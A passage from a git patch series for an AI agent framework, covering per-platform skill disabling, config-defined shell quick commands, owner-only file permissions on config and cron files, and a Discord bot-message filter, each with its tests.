+        from tools.skills_tool import _is_skill_disabled
+        assert _is_skill_disabled("discord-skill") is True
+
+
+# ---------------------------------------------------------------------------
+# _find_all_skills — disabled filtering
+# ---------------------------------------------------------------------------
+
+class TestFindAllSkillsFiltering:
+    @patch("tools.skills_tool._is_skill_disabled")
+    @patch("tools.skills_tool.skill_matches_platform")
+    @patch("tools.skills_tool.SKILLS_DIR")
+    def test_disabled_skill_excluded(self, mock_dir, mock_platform, mock_disabled, tmp_path):
+        skill_dir = tmp_path / "my-skill"
+        skill_dir.mkdir()
+        skill_md = skill_dir / "SKILL.md"
+        skill_md.write_text("---\nname: my-skill\ndescription: A test skill\n---\nContent")
+        mock_dir.exists.return_value = True
+        mock_dir.rglob.return_value = [skill_md]
+        mock_platform.return_value = True
+        mock_disabled.return_value = True
+        from tools.skills_tool import _find_all_skills
+        skills = _find_all_skills()
+        assert not any(s["name"] == "my-skill" for s in skills)
+
+    @patch("tools.skills_tool._is_skill_disabled")
+    @patch("tools.skills_tool.skill_matches_platform")
+    @patch("tools.skills_tool.SKILLS_DIR")
+    def test_enabled_skill_included(self, mock_dir, mock_platform, mock_disabled, tmp_path):
+        skill_dir = tmp_path / "my-skill"
+        skill_dir.mkdir()
+        skill_md = skill_dir / "SKILL.md"
+        skill_md.write_text("---\nname: my-skill\ndescription: A test skill\n---\nContent")
+        mock_dir.exists.return_value = True
+        mock_dir.rglob.return_value = [skill_md]
+        mock_platform.return_value = True
+        mock_disabled.return_value = False
+        from tools.skills_tool import _find_all_skills
+        skills = _find_all_skills()
+        assert any(s["name"] == "my-skill" for s in skills)
+
+
+# ---------------------------------------------------------------------------
+# _get_categories
+# ---------------------------------------------------------------------------
+
+class TestGetCategories:
+    def test_extracts_unique_categories(self):
+        from hermes_cli.skills_config import _get_categories
+        skills = [
+            {"name": "a", "category": "mlops", "description": ""},
+            {"name": "b", "category": "coding", "description": ""},
+            {"name": "c", "category": "mlops", "description": ""},
+        ]
+        cats = _get_categories(skills)
+        assert cats == ["coding", "mlops"]
+
+    def test_none_becomes_uncategorized(self):
+        from hermes_cli.skills_config import _get_categories
+        skills = [{"name": "a", "category": None, "description": ""}]
+        assert "uncategorized" in _get_categories(skills)
diff --git a/tools/skills_tool.py b/tools/skills_tool.py
index e8baa0f5..c8afca77 100644
--- a/tools/skills_tool.py
+++ b/tools/skills_tool.py
@@ -219,6 +219,29 @@ def _parse_tags(tags_value) -> List[str]:
     return [t.strip().strip('"\'') for t in tags_value.split(',') if t.strip()]
 
 
+
+def _is_skill_disabled(name: str, platform: str = None) -> bool:
+    """Check if a skill is disabled in config, globally or for a specific platform.
+
+    Platform is resolved from the ``platform`` argument, then the
+    ``HERMES_PLATFORM`` env var, then falls back to the global disabled list.
+    """
+    import os
+    try:
+        from hermes_cli.config import load_config
+        config = load_config()
+        skills_cfg = config.get("skills", {})
+        # Resolve platform
+        resolved_platform = platform or os.getenv("HERMES_PLATFORM")
+        if resolved_platform:
+            platform_disabled = skills_cfg.get("platform_disabled", {}).get(resolved_platform)
+            if platform_disabled is not None:
+                return name in platform_disabled
+        # Fall back to global disabled list
+        return name in skills_cfg.get("disabled", [])
+    except Exception:
+        return False
+
 def _find_all_skills() -> List[Dict[str, Any]]:
     """
     Recursively find all skills in ~/.hermes/skills/.
@@ -249,6 +272,9 @@ def _find_all_skills() -> List[Dict[str, Any]]:
                 continue
             
             name = frontmatter.get('name', skill_dir.name)[:MAX_NAME_LENGTH]
+            # Skip disabled skills
+            if _is_skill_disabled(name):
+                continue
             
             description = frontmatter.get('description', '')
             if not description:

From 1404f846a70d8802b0545fa65d8b69c3532c879b Mon Sep 17 00:00:00 2001
From: teyrebaz33 <hakanerten02@hotmail.com>
Date: Mon, 9 Mar 2026 07:38:06 +0300
Subject: [PATCH 011/105] feat(cli,gateway): add user-defined quick commands
 that bypass agent loop

Implements config-driven quick commands for both CLI and gateway that
execute locally without invoking the LLM.

Config example (~/.hermes/config.yaml):
  quick_commands:
    limits:
      type: exec
      command: /home/user/.local/bin/hermes-limits
    dn:
      type: exec
      command: echo daily-note

Changes:
- hermes_cli/config.py: add quick_commands: {} default
- cli.py: check quick_commands before skill commands in process_command()
- gateway/run.py: check quick_commands before skill commands in _handle_message()
- tests/test_quick_commands.py: 11 tests covering exec, timeout, unsupported type, missing command, priority over skills

Closes #744
---
 cli.py                       |  27 ++++++-
 gateway/run.py               |  27 +++++++
 hermes_cli/config.py         |   2 +
 tests/test_quick_commands.py | 137 +++++++++++++++++++++++++++++++++++
 4 files changed, 191 insertions(+), 2 deletions(-)
 create mode 100644 tests/test_quick_commands.py

diff --git a/cli.py b/cli.py
index 937966b0..d9da71fe 100755
--- a/cli.py
+++ b/cli.py
@@ -2400,9 +2400,32 @@ class HermesCLI:
         elif cmd_lower == "/reload-mcp":
             self._reload_mcp()
         else:
-            # Check for skill slash commands (/gif-search, /axolotl, etc.)
+            # Check for user-defined quick commands (bypass agent loop, no LLM call)
             base_cmd = cmd_lower.split()[0]
-            if base_cmd in _skill_commands:
+            quick_commands = self.config.get("quick_commands", {})
+            if base_cmd.lstrip("/") in quick_commands:
+                qcmd = quick_commands[base_cmd.lstrip("/")]
+                if qcmd.get("type") == "exec":
+                    import subprocess
+                    exec_cmd = qcmd.get("command", "")
+                    if exec_cmd:
+                        try:
+                            result = subprocess.run(
+                                exec_cmd, shell=True, capture_output=True,
+                                text=True, timeout=30
+                            )
+                            output = result.stdout.strip() or result.stderr.strip()
+                            self.console.print(output if output else "[dim]Command returned no output[/]")
+                        except subprocess.TimeoutExpired:
+                            self.console.print("[bold red]Quick command timed out (30s)[/]")
+                        except Exception as e:
+                            self.console.print(f"[bold red]Quick command error: {e}[/]")
+                    else:
+                        self.console.print(f"[bold red]Quick command '{base_cmd}' has no command defined[/]")
+                else:
+                    self.console.print(f"[bold red]Quick command '{base_cmd}' has unsupported type (only 'exec' is supported)[/]")
+            # Check for skill slash commands (/gif-search, /axolotl, etc.)
+            elif base_cmd in _skill_commands:
                 user_instruction = cmd_original[len(base_cmd):].strip()
                 msg = build_skill_invocation_message(base_cmd, user_instruction)
                 if msg:
diff --git a/gateway/run.py b/gateway/run.py
index b32f2d2d..87902bc5 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -771,6 +771,33 @@ class GatewayRunner:
         if command == "resume":
             return await self._handle_resume_command(event)
         
+        # User-defined quick commands (bypass agent loop, no LLM call)
+        if command:
+            quick_commands = self.config.get("quick_commands", {})
+            if command in quick_commands:
+                qcmd = quick_commands[command]
+                if qcmd.get("type") == "exec":
+                    import asyncio
+                    exec_cmd = qcmd.get("command", "")
+                    if exec_cmd:
+                        try:
+                            proc = await asyncio.create_subprocess_shell(
+                                exec_cmd,
+                                stdout=asyncio.subprocess.PIPE,
+                                stderr=asyncio.subprocess.PIPE,
+                            )
+                            stdout, stderr = await asyncio.wait_for(proc.communicate(), timeout=30)
+                            output = (stdout or stderr).decode().strip()
+                            return output if output else "Command returned no output."
+                        except asyncio.TimeoutError:
+                            return "Quick command timed out (30s)."
+                        except Exception as e:
+                            return f"Quick command error: {e}"
+                    else:
+                        return f"Quick command '/{command}' has no command defined."
+                else:
+                    return f"Quick command '/{command}' has unsupported type (only 'exec' is supported)."
+
         # Skill slash commands: /skill-name loads the skill and sends to agent
         if command:
             try:
diff --git a/hermes_cli/config.py b/hermes_cli/config.py
index 0e6f51c1..51f1990f 100644
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -147,6 +147,8 @@ DEFAULT_CONFIG = {
 
     # Permanently allowed dangerous command patterns (added via "always" approval)
     "command_allowlist": [],
+    # User-defined quick commands that bypass the agent loop (type: exec only)
+    "quick_commands": {},
 
     # Config schema version - bump this when adding new required fields
     "_config_version": 5,
diff --git a/tests/test_quick_commands.py b/tests/test_quick_commands.py
new file mode 100644
index 00000000..c34a3d05
--- /dev/null
+++ b/tests/test_quick_commands.py
@@ -0,0 +1,137 @@
+"""Tests for user-defined quick commands that bypass the agent loop."""
+import subprocess
+from unittest.mock import MagicMock, patch, AsyncMock
+import pytest
+
+
+# ── CLI tests ──────────────────────────────────────────────────────────────
+
+class TestCLIQuickCommands:
+    """Test quick command dispatch in HermesCLI.process_command."""
+
+    def _make_cli(self, quick_commands):
+        from cli import HermesCLI
+        cli = HermesCLI.__new__(HermesCLI)
+        cli.config = {"quick_commands": quick_commands}
+        cli.console = MagicMock()
+        cli.agent = None
+        cli.conversation_history = []
+        return cli
+
+    def test_exec_command_runs_and_prints_output(self):
+        cli = self._make_cli({"dn": {"type": "exec", "command": "echo daily-note"}})
+        result = cli.process_command("/dn")
+        assert result is True
+        cli.console.print.assert_called_once_with("daily-note")
+
+    def test_exec_command_stderr_shown_on_no_stdout(self):
+        cli = self._make_cli({"err": {"type": "exec", "command": "echo error >&2"}})
+        result = cli.process_command("/err")
+        assert result is True
+        # stderr fallback — should print something
+        cli.console.print.assert_called_once()
+
+    def test_exec_command_no_output_shows_fallback(self):
+        cli = self._make_cli({"empty": {"type": "exec", "command": "true"}})
+        cli.process_command("/empty")
+        cli.console.print.assert_called_once()
+        args = cli.console.print.call_args[0][0]
+        assert "no output" in args.lower()
+
+    def test_unsupported_type_shows_error(self):
+        cli = self._make_cli({"bad": {"type": "prompt", "command": "echo hi"}})
+        cli.process_command("/bad")
+        cli.console.print.assert_called_once()
+        args = cli.console.print.call_args[0][0]
+        assert "unsupported type" in args.lower()
+
+    def test_missing_command_field_shows_error(self):
+        cli = self._make_cli({"oops": {"type": "exec"}})
+        cli.process_command("/oops")
+        cli.console.print.assert_called_once()
+        args = cli.console.print.call_args[0][0]
+        assert "no command defined" in args.lower()
+
+    def test_quick_command_takes_priority_over_skill_commands(self):
+        """Quick commands must be checked before skill slash commands."""
+        cli = self._make_cli({"mygif": {"type": "exec", "command": "echo overridden"}})
+        with patch("cli._skill_commands", {"/mygif": {"name": "gif-search"}}):
+            cli.process_command("/mygif")
+        cli.console.print.assert_called_once_with("overridden")
+
+    def test_unknown_command_still_shows_error(self):
+        cli = self._make_cli({})
+        cli.process_command("/nonexistent")
+        cli.console.print.assert_called()
+        args = cli.console.print.call_args_list[0][0][0]
+        assert "unknown command" in args.lower()
+
+    def test_timeout_shows_error(self):
+        cli = self._make_cli({"slow": {"type": "exec", "command": "sleep 100"}})
+        with patch("subprocess.run", side_effect=subprocess.TimeoutExpired("sleep", 30)):
+            cli.process_command("/slow")
+        cli.console.print.assert_called_once()
+        args = cli.console.print.call_args[0][0]
+        assert "timed out" in args.lower()
+
+
+# ── Gateway tests ──────────────────────────────────────────────────────────
+
+class TestGatewayQuickCommands:
+    """Test quick command dispatch in GatewayRunner._handle_message."""
+
+    def _make_event(self, command, args=""):
+        event = MagicMock()
+        event.get_command.return_value = command
+        event.get_command_args.return_value = args
+        event.text = f"/{command} {args}".strip()
+        event.source = MagicMock()
+        event.source.user_id = "test_user"
+        event.source.user_name = "Test User"
+        event.source.platform.value = "telegram"
+        event.source.chat_type = "dm"
+        event.source.chat_id = "123"
+        return event
+
+    @pytest.mark.asyncio
+    async def test_exec_command_returns_output(self):
+        from gateway.run import GatewayRunner
+        runner = GatewayRunner.__new__(GatewayRunner)
+        runner.config = {"quick_commands": {"limits": {"type": "exec", "command": "echo ok"}}}
+        runner._running_agents = {}
+        runner._pending_messages = {}
+        runner._is_user_authorized = MagicMock(return_value=True)
+
+        event = self._make_event("limits")
+        result = await runner._handle_message(event)
+        assert result == "ok"
+
+    @pytest.mark.asyncio
+    async def test_unsupported_type_returns_error(self):
+        from gateway.run import GatewayRunner
+        runner = GatewayRunner.__new__(GatewayRunner)
+        runner.config = {"quick_commands": {"bad": {"type": "prompt", "command": "echo hi"}}}
+        runner._running_agents = {}
+        runner._pending_messages = {}
+        runner._is_user_authorized = MagicMock(return_value=True)
+
+        event = self._make_event("bad")
+        result = await runner._handle_message(event)
+        assert result is not None
+        assert "unsupported type" in result.lower()
+
+    @pytest.mark.asyncio
+    async def test_timeout_returns_error(self):
+        from gateway.run import GatewayRunner
+        import asyncio
+        runner = GatewayRunner.__new__(GatewayRunner)
+        runner.config = {"quick_commands": {"slow": {"type": "exec", "command": "sleep 100"}}}
+        runner._running_agents = {}
+        runner._pending_messages = {}
+        runner._is_user_authorized = MagicMock(return_value=True)
+
+        event = self._make_event("slow")
+        with patch("asyncio.wait_for", side_effect=asyncio.TimeoutError):
+            result = await runner._handle_message(event)
+        assert result is not None
+        assert "timed out" in result.lower()

From 0ce190be0dd7b0d6e0b9ccc59f6cfc372b1cd835 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Mon, 9 Mar 2026 02:19:32 -0700
Subject: [PATCH 012/105] security: enforce 0600/0700 file permissions on
 sensitive files (inspired by openclaw)

Enforce owner-only permissions on files and directories that contain
secrets or sensitive data:

- cron/jobs.py: jobs.json (0600), cron dirs (0700), job output files (0600)
- hermes_cli/config.py: config.yaml (0600), .env (0600), ~/.hermes/* dirs (0700)
- cli.py: config.yaml via save_config_value (0600)

All chmod calls use try/except for Windows compatibility.

Includes _secure_file() and _secure_dir() helpers with graceful fallback.
8 new tests verify permissions on all file types.

Inspired by openclaw v2026.3.7 file permission enforcement.
---
 cli.py                         |   6 ++
 cron/jobs.py                   |  24 +++++-
 hermes_cli/config.py           |  31 ++++++--
 tests/test_file_permissions.py | 135 +++++++++++++++++++++++++++++++++
 4 files changed, 190 insertions(+), 6 deletions(-)
 create mode 100644 tests/test_file_permissions.py

diff --git a/cli.py b/cli.py
index a63e6053..41f80481 100755
--- a/cli.py
+++ b/cli.py
@@ -992,6 +992,12 @@ def save_config_value(key_path: str, value: any) -> bool:
         with open(config_path, 'w') as f:
             yaml.dump(config, f, default_flow_style=False, sort_keys=False)
         
+        # Enforce owner-only permissions on config files (contain API keys)
+        try:
+            os.chmod(config_path, 0o600)
+        except (OSError, NotImplementedError):
+            pass
+        
         return True
     except Exception as e:
         logger.error("Failed to save config: %s", e)
diff --git a/cron/jobs.py b/cron/jobs.py
index c69ee7cf..8d5c1829 100644
--- a/cron/jobs.py
+++ b/cron/jobs.py
@@ -32,10 +32,29 @@ JOBS_FILE = CRON_DIR / "jobs.json"
 OUTPUT_DIR = CRON_DIR / "output"
 
 
+def _secure_dir(path: Path):
+    """Set directory to owner-only access (0700). No-op on Windows."""
+    try:
+        os.chmod(path, 0o700)
+    except (OSError, NotImplementedError):
+        pass  # Windows or other platforms where chmod is not supported
+
+
+def _secure_file(path: Path):
+    """Set file to owner-only read/write (0600). No-op on Windows."""
+    try:
+        if path.exists():
+            os.chmod(path, 0o600)
+    except (OSError, NotImplementedError):
+        pass
+
+
 def ensure_dirs():
-    """Ensure cron directories exist."""
+    """Ensure cron directories exist with secure permissions."""
     CRON_DIR.mkdir(parents=True, exist_ok=True)
     OUTPUT_DIR.mkdir(parents=True, exist_ok=True)
+    _secure_dir(CRON_DIR)
+    _secure_dir(OUTPUT_DIR)
 
 
 # =============================================================================
@@ -223,6 +242,7 @@ def save_jobs(jobs: List[Dict[str, Any]]):
             f.flush()
             os.fsync(f.fileno())
         os.replace(tmp_path, JOBS_FILE)
+        _secure_file(JOBS_FILE)
     except BaseException:
         try:
             os.unlink(tmp_path)
@@ -400,11 +420,13 @@ def save_job_output(job_id: str, output: str):
     ensure_dirs()
     job_output_dir = OUTPUT_DIR / job_id
     job_output_dir.mkdir(parents=True, exist_ok=True)
+    _secure_dir(job_output_dir)
     
     timestamp = _hermes_now().strftime("%Y-%m-%d_%H-%M-%S")
     output_file = job_output_dir / f"{timestamp}.md"
     
     with open(output_file, 'w', encoding='utf-8') as f:
         f.write(output)
+    _secure_file(output_file)
     
     return output_file
diff --git a/hermes_cli/config.py b/hermes_cli/config.py
index 7a31b551..300d18ab 100644
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -46,13 +46,32 @@ def get_project_root() -> Path:
     """Get the project installation directory."""
     return Path(__file__).parent.parent.resolve()
 
+def _secure_dir(path):
+    """Set directory to owner-only access (0700). No-op on Windows."""
+    try:
+        os.chmod(path, 0o700)
+    except (OSError, NotImplementedError):
+        pass
+
+
+def _secure_file(path):
+    """Set file to owner-only read/write (0600). No-op on Windows."""
+    try:
+        if os.path.exists(str(path)):
+            os.chmod(path, 0o600)
+    except (OSError, NotImplementedError):
+        pass
+
+
 def ensure_hermes_home():
-    """Ensure ~/.hermes directory structure exists."""
+    """Ensure ~/.hermes directory structure exists with secure permissions."""
     home = get_hermes_home()
-    (home / "cron").mkdir(parents=True, exist_ok=True)
-    (home / "sessions").mkdir(parents=True, exist_ok=True)
-    (home / "logs").mkdir(parents=True, exist_ok=True)
-    (home / "memories").mkdir(parents=True, exist_ok=True)
+    home.mkdir(parents=True, exist_ok=True)
+    _secure_dir(home)
+    for subdir in ("cron", "sessions", "logs", "memories"):
+        d = home / subdir
+        d.mkdir(parents=True, exist_ok=True)
+        _secure_dir(d)
 
 
 # =============================================================================
@@ -808,6 +827,7 @@ def save_config(config: Dict[str, Any]):
             sections.append("fallback")
         if sections:
             f.write(_COMMENTED_SECTIONS)
+    _secure_file(config_path)
 
 
 def load_env() -> Dict[str, str]:
@@ -860,6 +880,7 @@ def save_env_value(key: str, value: str):
     
     with open(env_path, 'w', **write_kw) as f:
         f.writelines(lines)
+    _secure_file(env_path)
 
 
 def get_env_value(key: str) -> Optional[str]:
diff --git a/tests/test_file_permissions.py b/tests/test_file_permissions.py
new file mode 100644
index 00000000..cc816f6f
--- /dev/null
+++ b/tests/test_file_permissions.py
@@ -0,0 +1,135 @@
+"""Tests for file permissions hardening on sensitive files."""
+
+import json
+import os
+import stat
+import tempfile
+import unittest
+from pathlib import Path
+from unittest.mock import patch
+
+
+class TestCronFilePermissions(unittest.TestCase):
+    """Verify cron files get secure permissions."""
+
+    def setUp(self):
+        self.tmpdir = tempfile.mkdtemp()
+        self.cron_dir = Path(self.tmpdir) / "cron"
+        self.output_dir = self.cron_dir / "output"
+
+    def tearDown(self):
+        import shutil
+        shutil.rmtree(self.tmpdir, ignore_errors=True)
+
+    @patch("cron.jobs.CRON_DIR")
+    @patch("cron.jobs.OUTPUT_DIR")
+    @patch("cron.jobs.JOBS_FILE")
+    def test_ensure_dirs_sets_0700(self, mock_jobs_file, mock_output, mock_cron):
+        mock_cron.__class__ = Path
+        # Use real paths
+        cron_dir = Path(self.tmpdir) / "cron"
+        output_dir = cron_dir / "output"
+
+        with patch("cron.jobs.CRON_DIR", cron_dir), \
+             patch("cron.jobs.OUTPUT_DIR", output_dir):
+            from cron.jobs import ensure_dirs
+            ensure_dirs()
+
+            cron_mode = stat.S_IMODE(os.stat(cron_dir).st_mode)
+            output_mode = stat.S_IMODE(os.stat(output_dir).st_mode)
+            self.assertEqual(cron_mode, 0o700)
+            self.assertEqual(output_mode, 0o700)
+
+    @patch("cron.jobs.CRON_DIR")
+    @patch("cron.jobs.OUTPUT_DIR")
+    @patch("cron.jobs.JOBS_FILE")
+    def test_save_jobs_sets_0600(self, mock_jobs_file, mock_output, mock_cron):
+        cron_dir = Path(self.tmpdir) / "cron"
+        output_dir = cron_dir / "output"
+        jobs_file = cron_dir / "jobs.json"
+
+        with patch("cron.jobs.CRON_DIR", cron_dir), \
+             patch("cron.jobs.OUTPUT_DIR", output_dir), \
+             patch("cron.jobs.JOBS_FILE", jobs_file):
+            from cron.jobs import save_jobs
+            save_jobs([{"id": "test", "prompt": "hello"}])
+
+            file_mode = stat.S_IMODE(os.stat(jobs_file).st_mode)
+            self.assertEqual(file_mode, 0o600)
+
+    def test_save_job_output_sets_0600(self):
+        output_dir = Path(self.tmpdir) / "output"
+        with patch("cron.jobs.OUTPUT_DIR", output_dir), \
+             patch("cron.jobs.CRON_DIR", Path(self.tmpdir)), \
+             patch("cron.jobs.ensure_dirs"):
+            output_dir.mkdir(parents=True, exist_ok=True)
+            from cron.jobs import save_job_output
+            output_file = save_job_output("test-job", "test output content")
+
+            file_mode = stat.S_IMODE(os.stat(output_file).st_mode)
+            self.assertEqual(file_mode, 0o600)
+
+            # Job output dir should also be 0700
+            job_dir = output_dir / "test-job"
+            dir_mode = stat.S_IMODE(os.stat(job_dir).st_mode)
+            self.assertEqual(dir_mode, 0o700)
+
+
+class TestConfigFilePermissions(unittest.TestCase):
+    """Verify config files get secure permissions."""
+
+    def setUp(self):
+        self.tmpdir = tempfile.mkdtemp()
+
+    def tearDown(self):
+        import shutil
+        shutil.rmtree(self.tmpdir, ignore_errors=True)
+
+    def test_save_config_sets_0600(self):
+        config_path = Path(self.tmpdir) / "config.yaml"
+        with patch("hermes_cli.config.get_config_path", return_value=config_path), \
+             patch("hermes_cli.config.ensure_hermes_home"):
+            from hermes_cli.config import save_config
+            save_config({"model": "test/model"})
+
+            file_mode = stat.S_IMODE(os.stat(config_path).st_mode)
+            self.assertEqual(file_mode, 0o600)
+
+    def test_save_env_value_sets_0600(self):
+        env_path = Path(self.tmpdir) / ".env"
+        with patch("hermes_cli.config.get_env_path", return_value=env_path), \
+             patch("hermes_cli.config.ensure_hermes_home"):
+            from hermes_cli.config import save_env_value
+            save_env_value("TEST_KEY", "test_value")
+
+            file_mode = stat.S_IMODE(os.stat(env_path).st_mode)
+            self.assertEqual(file_mode, 0o600)
+
+    def test_ensure_hermes_home_sets_0700(self):
+        home = Path(self.tmpdir) / ".hermes"
+        with patch("hermes_cli.config.get_hermes_home", return_value=home):
+            from hermes_cli.config import ensure_hermes_home
+            ensure_hermes_home()
+
+            home_mode = stat.S_IMODE(os.stat(home).st_mode)
+            self.assertEqual(home_mode, 0o700)
+
+            for subdir in ("cron", "sessions", "logs", "memories"):
+                subdir_mode = stat.S_IMODE(os.stat(home / subdir).st_mode)
+                self.assertEqual(subdir_mode, 0o700, f"{subdir} should be 0700")
+
+
+class TestSecureHelpers(unittest.TestCase):
+    """Test the _secure_file and _secure_dir helpers."""
+
+    def test_secure_file_nonexistent_no_error(self):
+        from cron.jobs import _secure_file
+        _secure_file(Path("/nonexistent/path/file.json"))  # Should not raise
+
+    def test_secure_dir_nonexistent_no_error(self):
+        from cron.jobs import _secure_dir
+        _secure_dir(Path("/nonexistent/path"))  # Should not raise
+
+
+if __name__ == "__main__":
+    unittest.main()

From f8240143b60f6e4635d4725dc0f7e47d6883732e Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Mon, 9 Mar 2026 02:20:57 -0700
Subject: [PATCH 013/105] feat(discord): add DISCORD_ALLOW_BOTS config for bot
 message filtering (inspired by openclaw)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Add configurable bot message filtering via DISCORD_ALLOW_BOTS env var:

- 'none' (default): Ignore all other bot messages — matches previous
  behavior where only our own bot was filtered, but now ALL bots are
  filtered by default for cleaner channels
- 'mentions': Accept bot messages only when they @mention our bot —
  useful for bot-to-bot workflows triggered by mentions
- 'all': Accept all bot messages — for setups where bots need to
  interact freely

Previously, we only ignored our own bot's messages, allowing all other
bots through. This could cause noisy loops in channels with multiple bots.

8 new tests covering all filter modes and edge cases.

Inspired by openclaw v2026.3.7 Discord allowBots: 'mentions' config.
---
 gateway/platforms/discord.py             |  16 +++-
 tests/gateway/test_discord_bot_filter.py | 117 +++++++++++++++++++++++
 2 files changed, 132 insertions(+), 1 deletion(-)
 create mode 100644 tests/gateway/test_discord_bot_filter.py

diff --git a/gateway/platforms/discord.py b/gateway/platforms/discord.py
index 905e20d6..9afc29a8 100644
--- a/gateway/platforms/discord.py
+++ b/gateway/platforms/discord.py
@@ -120,9 +120,23 @@ class DiscordAdapter(BasePlatformAdapter):
             
             @self._client.event
             async def on_message(message: DiscordMessage):
-                # Ignore bot's own messages
+                # Always ignore our own messages
                 if message.author == self._client.user:
                     return
+                
+                # Bot message filtering (DISCORD_ALLOW_BOTS):
+                #   "none"     — ignore all other bots (default)
+                #   "mentions" — accept bot messages only when they @mention us
+                #   "all"      — accept all bot messages
+                if getattr(message.author, "bot", False):
+                    allow_bots = os.getenv("DISCORD_ALLOW_BOTS", "none").lower().strip()
+                    if allow_bots == "none":
+                        return
+                    elif allow_bots == "mentions":
+                        if not self._client.user or self._client.user not in message.mentions:
+                            return
+                    # "all" falls through to handle_message
+                
                 await self._handle_message(message)
             
             # Register slash commands
diff --git a/tests/gateway/test_discord_bot_filter.py b/tests/gateway/test_discord_bot_filter.py
new file mode 100644
index 00000000..09a78ae6
--- /dev/null
+++ b/tests/gateway/test_discord_bot_filter.py
@@ -0,0 +1,117 @@
+"""Tests for Discord bot message filtering (DISCORD_ALLOW_BOTS)."""
+
+import asyncio
+import os
+import unittest
+from unittest.mock import AsyncMock, MagicMock, patch
+
+
+def _make_author(*, bot: bool = False, is_self: bool = False):
+    """Create a mock Discord author."""
+    author = MagicMock()
+    author.bot = bot
+    author.id = 99999 if is_self else 12345
+    author.name = "TestBot" if bot else "TestUser"
+    author.display_name = author.name
+    return author
+
+
+def _make_message(*, author=None, content="hello", mentions=None, is_dm=False):
+    """Create a mock Discord message."""
+    msg = MagicMock()
+    msg.author = author or _make_author()
+    msg.content = content
+    msg.attachments = []
+    msg.mentions = mentions or []
+    if is_dm:
+        import discord
+        msg.channel = MagicMock(spec=discord.DMChannel)
+        msg.channel.id = 111
+    else:
+        msg.channel = MagicMock()
+        msg.channel.id = 222
+        msg.channel.name = "test-channel"
+        msg.channel.guild = MagicMock()
+        msg.channel.guild.name = "TestServer"
+        # Make isinstance checks fail for DMChannel and Thread
+        type(msg.channel).__name__ = "TextChannel"
+    return msg
+
+
+class TestDiscordBotFilter(unittest.TestCase):
+    """Test the DISCORD_ALLOW_BOTS filtering logic."""
+
+    def _run_filter(self, message, allow_bots="none", client_user=None):
+        """Simulate the on_message filter logic and return whether message was accepted."""
+        # Replicate the exact filter logic from discord.py on_message
+        if message.author == client_user:
+            return False  # own messages always ignored
+
+        if getattr(message.author, "bot", False):
+            allow = allow_bots.lower().strip()
+            if allow == "none":
+                return False
+            elif allow == "mentions":
+                if not client_user or client_user not in message.mentions:
+                    return False
+            # "all" falls through
+        
+        return True  # message accepted
+
+    def test_own_messages_always_ignored(self):
+        """Bot's own messages are always ignored regardless of allow_bots."""
+        bot_user = _make_author(is_self=True)
+        msg = _make_message(author=bot_user)
+        self.assertFalse(self._run_filter(msg, "all", bot_user))
+
+    def test_human_messages_always_accepted(self):
+        """Human messages are always accepted regardless of allow_bots."""
+        human = _make_author(bot=False)
+        msg = _make_message(author=human)
+        self.assertTrue(self._run_filter(msg, "none"))
+        self.assertTrue(self._run_filter(msg, "mentions"))
+        self.assertTrue(self._run_filter(msg, "all"))
+
+    def test_allow_bots_none_rejects_bots(self):
+        """With allow_bots=none, all other bot messages are rejected."""
+        bot = _make_author(bot=True)
+        msg = _make_message(author=bot)
+        self.assertFalse(self._run_filter(msg, "none"))
+
+    def test_allow_bots_all_accepts_bots(self):
+        """With allow_bots=all, all bot messages are accepted."""
+        bot = _make_author(bot=True)
+        msg = _make_message(author=bot)
+        self.assertTrue(self._run_filter(msg, "all"))
+
+    def test_allow_bots_mentions_rejects_without_mention(self):
+        """With allow_bots=mentions, bot messages without @mention are rejected."""
+        our_user = _make_author(is_self=True)
+        bot = _make_author(bot=True)
+        msg = _make_message(author=bot, mentions=[])
+        self.assertFalse(self._run_filter(msg, "mentions", our_user))
+
+    def test_allow_bots_mentions_accepts_with_mention(self):
+        """With allow_bots=mentions, bot messages with @mention are accepted."""
+        our_user = _make_author(is_self=True)
+        bot = _make_author(bot=True)
+        msg = _make_message(author=bot, mentions=[our_user])
+        self.assertTrue(self._run_filter(msg, "mentions", our_user))
+
+    def test_default_is_none(self):
+        """Default behavior (no env var) should be 'none'."""
+        default = os.getenv("DISCORD_ALLOW_BOTS", "none")
+        self.assertEqual(default, "none")
+
+    def test_case_insensitive(self):
+        """Allow_bots value should be case-insensitive."""
+        bot = _make_author(bot=True)
+        msg = _make_message(author=bot)
+        self.assertTrue(self._run_filter(msg, "ALL"))
+        self.assertTrue(self._run_filter(msg, "All"))
+        self.assertFalse(self._run_filter(msg, "NONE"))
+        self.assertFalse(self._run_filter(msg, "None"))
+
+
+if __name__ == "__main__":
+    unittest.main()

From 912efe11b57bade7586c9caf484747914d2da692 Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Mon, 9 Mar 2026 13:25:52 +0300
Subject: [PATCH 014/105] fix(tests): add content attribute to fake result
 objects

_FakeReadResult and _FakeSearchResult now expose the attributes
that read_file_tool/search_tool access after the redact_sensitive_text
integration from main.
---
 tests/tools/test_read_loop_detection.py | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/tests/tools/test_read_loop_detection.py b/tests/tools/test_read_loop_detection.py
index d5f38a3d..dfa1c1ab 100644
--- a/tests/tools/test_read_loop_detection.py
+++ b/tests/tools/test_read_loop_detection.py
@@ -29,11 +29,11 @@ from tools.file_tools import (
 class _FakeReadResult:
     """Minimal stand-in for FileOperations.read_file return value."""
     def __init__(self, content="line1\nline2\n", total_lines=2):
-        self._content = content
+        self.content = content
         self._total_lines = total_lines
 
     def to_dict(self):
-        return {"content": self._content, "total_lines": self._total_lines}
+        return {"content": self.content, "total_lines": self._total_lines}
 
 
 def _fake_read_file(path, offset=1, limit=500):
@@ -42,6 +42,9 @@ def _fake_read_file(path, offset=1, limit=500):
 
 class _FakeSearchResult:
     """Minimal stand-in for FileOperations.search return value."""
+    def __init__(self):
+        self.matches = []
+
     def to_dict(self):
         return {"matches": [{"file": "test.py", "line": 1, "text": "match"}]}
 

From d82fcef91b685dce54873f0e01dfcdbd3e934731 Mon Sep 17 00:00:00 2001
From: aydnOktay <xaydinoktay@gmail.com>
